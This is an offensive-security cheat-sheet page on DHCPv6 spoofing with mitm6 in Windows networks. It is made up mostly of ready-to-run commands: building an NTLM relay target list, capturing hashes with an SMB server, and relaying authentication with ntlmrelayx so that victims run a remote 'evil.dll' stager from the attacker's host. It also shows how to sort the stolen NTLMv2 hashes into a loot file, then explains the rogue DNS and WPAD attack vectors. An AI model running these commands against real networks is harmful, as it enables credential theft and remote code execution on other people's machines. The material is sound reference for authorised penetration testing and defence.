TwitterGitHubBlogSponsor

DHCPv6 Spoofing

Dynamic Host Configuration Protocol version 6

mitm6

Install:

$ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6
$ python3 setup.py install
Or
$ pipx install -f "git+https://github.com/fox-it/mitm6.git"

Generate a list of targets for NTLM relay and prepare a C2 listener and stager:

$ cme smb 192.168.1.0/24 --gen-relay-list relay.txt

Start SMB server to capture NTLM hashes and serve the stager:

$ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out

Get ready to relay authentication and try executing a command:

$ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server

Start MitMing:

$ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn

Parse, sort and save NTLM hashes:

# Users
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6
$ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t
$ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6

# Machines
$ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1

Attack vectors

Grab hashes with smbserver.py (passive):

  1. mitm6.py poisons IPv6 DNS entries for all hosts in the /24 network.

  2. Victims start to use attacker's machine as the primary DNS server.

  3. mitm6.py on the attacker's machine acts like a rogue DNS server and responds with the attacker's IP for all incoming queries.

  4. smbserver.py collects hashes during SMB requests from victims.

Relay authentication with ntlmrelayx.py (active):

  1. mitm6.py poisons IPv6 DNS entries for all hosts in the /24 network.

  2. Victims start to use attacker's machine as the primary DNS server.

  3. mitm6.py on the attacker's machine acts like a rogue DNS server, ntlmrelayx.py serves a malicious WPAD file with an inexistent hostname (which will be resolved to the attacker's IP anyway) and acts like a rogue proxy server and mitm6.py responds with the attacker's IP for all the incoming DNS queries.

  4. Victims grab the WPAD file and ask the rogue IPv6 DNS server (attacker's machine) to resolve its location - resolved to attacker's machine.

  5. Victims go to the rogue proxy server and there ntlmrelayx.py responses with HTTP 407 Proxy Authentication.

Last updated